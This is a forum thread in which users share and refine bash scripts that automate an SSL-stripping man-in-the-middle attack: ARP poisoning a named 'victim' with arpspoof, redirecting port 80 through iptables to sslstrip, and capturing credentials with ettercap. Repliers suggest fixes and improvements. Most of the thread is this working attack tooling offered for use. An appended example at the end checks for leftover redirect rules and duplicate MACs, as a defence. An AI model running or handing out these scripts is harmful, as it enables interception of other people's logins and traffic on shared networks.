I made a script for SSL sniffing as per g0tmilk's howto here: forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html#post141532 .
I'm not new to linux, but new to BackTrack. This is the first shell script that I ever made. Feedback would be GREATLY appreciated.
Note: To use properly, you first have to uncomment 2 lines in /etc/etter.conf (the redir_command_on and redir_command_off lines for iptables).
Hope this helps!
Code:
#!/bin/bash
clear
echo "Hello $USER!"
echo "Welcome to the SSL sniffing script"
clear
echo "What's the interface you'll be using? [eth0]"
read iface
if [ "$iface" = "" ]
then
    iface="eth0"
fi
clear
echo "What's the target's IP?"
read tip
clear
echo "What's the target's gateway? [192.168.1.1]"
read tdg
if [ "$tdg" = "" ]
then
    tdg="192.168.1.1"
fi
clear
echo "The selected interface is $iface"
echo "The target IP is $tip"
echo "The target gateway is $tdg"
echo "I'm ready to run the script."
echo "Are you sure you want to run it [y/n]?"
read yn
if [ "$yn" != "y" ]
then
    echo "Exiting..."
    echo "Have a nice day :)"
    exit 0
fi
clear
echo "Running..."
echo 1 > /proc/sys/net/ipv4/ip_forward
konsole -e arpspoof -i $iface -t $tip $tdg &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
konsole -e sslstrip -a -k -f &
clear
echo "Running ettercap"
ettercap -T -q -i $iface
clear
echo "All cleaned up."
echo "Have a nice day :)"
nicely done. thanks!
"Why is it drug addicts and computer aficionados are both called users?"
remove at least the
Code:
echo "All cleaned up."
because the system isn't cleaned up, you still have ip_forwarding enabled
haven't tried the script
Auswaertsspiel
But you don't have to uncomment the 2 lines!!!!
then you would have ettercap forwarding the packets!!!
When you uncomment the forwarding of ettercap then ettercap disables the ip forwarding of the kernel (it is in the manual) ...
Ok? and don't forget to run ettercap in unoffensive mode ( -u arg)....
Very good script by the way!!!
Well done Jimmy Kane
Keep scripting and sharing
BTW Welcome to the forums
Nick
@davos1: Very nice script man, keep up the good work, and contributing.
You most likely chose "konsole" so it launches those in their own terminals so you can view output, but just sort of a note (you might already know about it) but the nohup command could be used in place of konsole for use if you were not running a graphical environment.
I would like to contribute the script I use for SSL sniffing, with contributing this I am not trying to start a "competition" or anything simply sharing open source code, in the mentality of open source. (let's all share and improve each other's code) There are some issues I plan to address with this script, and many improvements I want to address. In the current state it executes correctly and is capable of grabbing the appropriate data. Please let me know of *any* issues you have with it, ideas, improvements, etc. All feedback is constructive feedback.
General usage: sslsniff.sh -v <ip of target> -g <network gateway>
-v, and -g, are required however -s is optional, if excluded sslsniff defaults to port 10000.
Also note still required to edit etter.conf manually(plan to change that in the future)
Code:
#!/bin/bash
#
# Synopsis: A program to sniff traffic in an SSL connection
# Author: thims (thims DOT local AT gmail DOT com)
# Version: 0.2
# Date: 20091107
# Comments:
# ToDO:
# - Create section that edits iptables rules in /etc/etter.conf

# leave blank simply here for coding style
victim=
gateway=
sslPort=10000

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help - Print this help and exit
    -v, --victim - IP address of desired host
    -g, --gateway - IP address of network gateway
    -s, --sslport - Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
    if [ -n "$1" ] ;then
        echo "$1"
    fi
    exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
    cmd="$1"
    nohup $cmd > /dev/null &> /dev/null &
    sleep 5
    # here simply to handle sslstrip because it is ran by python it throws off pidof
    if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    fi
    if [ -z "$pid" ] ;then
        return 1
    else
        return 0
    fi
}

# poison the arp
function spoofMac() {
    echo -n "Poisoning the victim...."
    noHup "arpspoof -t "$victim" "$gateway""
    if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
    fi
    echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    echo "Ok"
}

# intercept the SSL cert
function sslInit() {
    echo -n "Setting up SSL intercept...."
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    noHup "sslstrip -a -f -k -l "$sslPort""
    if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
    fi
    echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    echo "Ok"
}

# capture the responses
function capture() {
    echo -n "Starting to sniff...."
    ettercap -T -q
}

# clean up enviroment
function cleanUp() {
    echo "Cleaning up...."
    echo -n "Closing SSL proxy...."
    kill $(cat /var/run/sslsniff.sslstrip.run)
    rm /var/run/sslsniff.sslstrip.run
    echo "Ok"
    echo -n "Unpoisoning the victim...."
    kill -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    rm /var/run/sslsniff.arpspoof.run
    echo "Ok"
    echo -n "Removing iptables rule and ip_forwarding...."
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "Ok"
    echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
    if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
    else
        spoofMac
        sslInit
        capture
        cleanUp
    fi
}

# some CLI ARGS?
while [ $1 -gt 0 ]
do
    case "$1" in
        "-h"|"--help")
            help
            die
            ;;
        "-v"|"--victim")
            victim="$2"
            ;;
        "-g"|"--gw")
            gateway="$2"
            ;;
        "-s"|"--sslport")
            sslPort="$1"
            ;;
        '')
            help
            echo
            die "Error: a syntactical one"
            ;;
        -*)
            help
            echo
            die "Error: a syntactical one"
            ;;
    esac
    shift
done

# main loop
thims,
Very nice script.
I already got some ideas from it. I love this one:
pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
100% agree. After all linux is sharing....lets all share and improve each others code....
Why don't you start a new post? It may be considered a hijacking (?). Don't know.
with contributing this I am not trying to start a "competition" or anything
One idea from me is to upload it to mediafire or whatever so we don't have to come here every-time and copy-paste etc.
Keep scripting and sharing.
(Please don't get bored soon.I personally keep my eyes on your scripts.)
Nick
A little more improvement
- taking the -i or --iface argument for choosing the interface cause arpspoof won't work if you don't run with the -i arg ....
- Printing the details of your configuration and I have put a small cat /proc/sys/net/ipv4/ip_forward due to reasons that sometimes echo 1 > /proc/sys/net/ipv4/ip_forward won't work (I don't know why)
Greeting's
Code:
#!/bin/bash
#
# Synopsis: A program to sniff traffic in an SSL connection
# Author: thims (thims DOT local AT gmail DOT com)
# Version: 0.2
# Date: 20091107
# Comments:
# ToDO:
# - Create section that edits iptables rules in /etc/etter.conf

# leave blank simply here for coding style
victim=
gateway=
sslPort=10000

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help - Print this help and exit
    -i, --iface - Select the interface
    -v, --victim - IP address of desired host
    -g, --gateway - IP address of network gateway
    -s, --sslport - Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
    if [ -n "$1" ] ;then
        echo "$1"
    fi
    exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
    cmd="$1"
    nohup $cmd > /dev/null &> /dev/null &
    sleep 5
    # here simply to handle sslstrip because it is ran by python it throws off pidof
    if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
        pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    else
        pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    fi
    if [ -z "$pid" ] ;then
        return 1
    else
        return 0
    fi
}

# poison the arp
function spoofMac() {
    echo -n "Poisoning the victim...."
    noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
    if [ $? -gt 0 ] ;then
        die "Error: could not initiate arpspoof. Dieing..."
    fi
    echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    echo "Ok"
}

# intercept the SSL cert
function sslInit() {
    echo -n "Setting up SSL intercept...."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    noHup "sslstrip -a -f -k -l "$sslPort""
    if [ $? -gt 0 ] ;then
        die "Error: could not initiate sslstrip. Dieing..."
    fi
    echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    cat -n "Forwarding:" /proc/sys/net/ipv4/ip_forward
    echo "Ok"
}

# capture the responses
function capture() {
    echo -n "Starting to sniff...."
    ettercap -T -q -i "$iface"
}

# clean up enviroment
function cleanUp() {
    echo "Cleaning up...."
    echo -n "Closing SSL proxy...."
    kill $(cat /var/run/sslsniff.sslstrip.run)
    rm /var/run/sslsniff.sslstrip.run
    echo "Ok"
    echo -n "Unpoisoning the victim...."
    kill -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    rm /var/run/sslsniff.arpspoof.run
    echo "Ok"
    echo -n "Removing iptables rule and ip_forwarding...."
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "Ok"
    echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
    if [ -z "$victim" ] || [ -z "$gateway" ] || [ -z "$iface" ];then
        help
        echo
        die "Error: a syntactical one1"
    else
        echo "Victim: " "$victim" " Ok!"
        echo "Gateway/Router: " "$gateway" " OK!"
        echo "Interface: " "$iface" " OK!"
        echo "SSLStrip on: " "$sslPort" " OK!"
        spoofMac
        sslInit
        capture
        cleanUp
    fi
}

# some CLI ARGS?
while [ $# -gt 0 ]
do
    case "$1" in
        "-h"|"--help")
            help
            die
            ;;
        "-v"|"--victim")
            victim="$2"
            ;;
        "-g"|"--gw")
            gateway="$2"
            ;;
        "-s"|"--sslport")
            sslPort="$1"
            ;;
        "-i"|"--iface")
            iface="$2"
            ;;
        '')
            help
            echo
            die "Error: a syntactical one"
            ;;
        -*)
            help
            echo
            die "Error: a syntactical one"
            ;;
    esac
    shift
done

# main loop
initialize
"Everything that is communication comes from ... quartz crystals..."
@nick_the_greek: thank you, I would like to think bash one-liners is my specialty (maybe just my interest, /me shrugs). Yeah I thought about posting a new thread, but at the time I couldn't being a new account, and I debated whether it would be a duplicate thread or a hijacking. I will probably create a new thread because I have made some changes already and incorporated a few new nice features. Also I just created a mediafire account good call. I will keep sharing, have any suggestions? all suggestions are def. welcome.
@jimmy Kane: Thank you, nice suggestions btw, I saw your email was just procrastinating a bit. I added the iface option and am looking into the ip_forward issue, I haven't quite got a replica of the issue yet, care to provide more details on it? I might just end up adding some error correction for when it sets up the ip_forward.
Note: when I create the new thread I will link to it from this post.
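
Added example, not part of any post in this thread: a defender-side check for the state the scripts above create and, as noted in the replies, can leave behind (ip_forward still set, the nat REDIRECT rule) plus the duplicate-MAC signature that ARP poisoning leaves in a neighbour table. The function names and the sample `iptables-save` / `ip neigh` text are constructed for illustration.

```bash
#!/bin/bash
# Constructed sample inputs (not captured from a real host).
SAMPLE_RULES='*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT'
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.50 dev eth0  FAILED'

# Print "dport->to_port" for every PREROUTING REDIRECT rule found in
# iptables-save output read from stdin.
find_redirects() {
    awk '$1 == "-A" && $2 == "PREROUTING" && /-j REDIRECT/ {
        dport = ""; to = ""
        for (i = 1; i < NF; i++) {
            if ($i == "--dport" || $i == "--destination-port") dport = $(i + 1)
            if ($i == "--to-ports") to = $(i + 1)
        }
        print dport "->" to
    }'
}

# Print each MAC that `ip neigh` output on stdin maps to more than one IP,
# followed by those IPs. A gateway sharing its MAC with another host is the
# usual sign that the table has been poisoned.
dup_macs() {
    awk '{
        for (i = 1; i < NF; i++) if ($i == "lladdr") {
            mac = tolower($(i + 1))
            if (mac in ips) ips[mac] = ips[mac] "," $1
            else ips[mac] = $1
            n[mac]++
        }
    }
    END { for (m in n) if (n[m] > 1) print m, ips[m] }'
}

# Succeed if IPv4 forwarding is on; the path argument defaults to the live
# kernel setting and can point at a saved copy instead.
forwarding_on() {
    [ "$(cat "${1:-/proc/sys/net/ipv4/ip_forward}" 2>/dev/null)" = "1" ]
}

printf '%s\n' "$SAMPLE_RULES" | find_redirects
printf '%s\n' "$SAMPLE_NEIGH" | dup_macs
```

On a live system the same functions take `iptables-save -t nat` and `ip neigh show` on stdin in place of the samples.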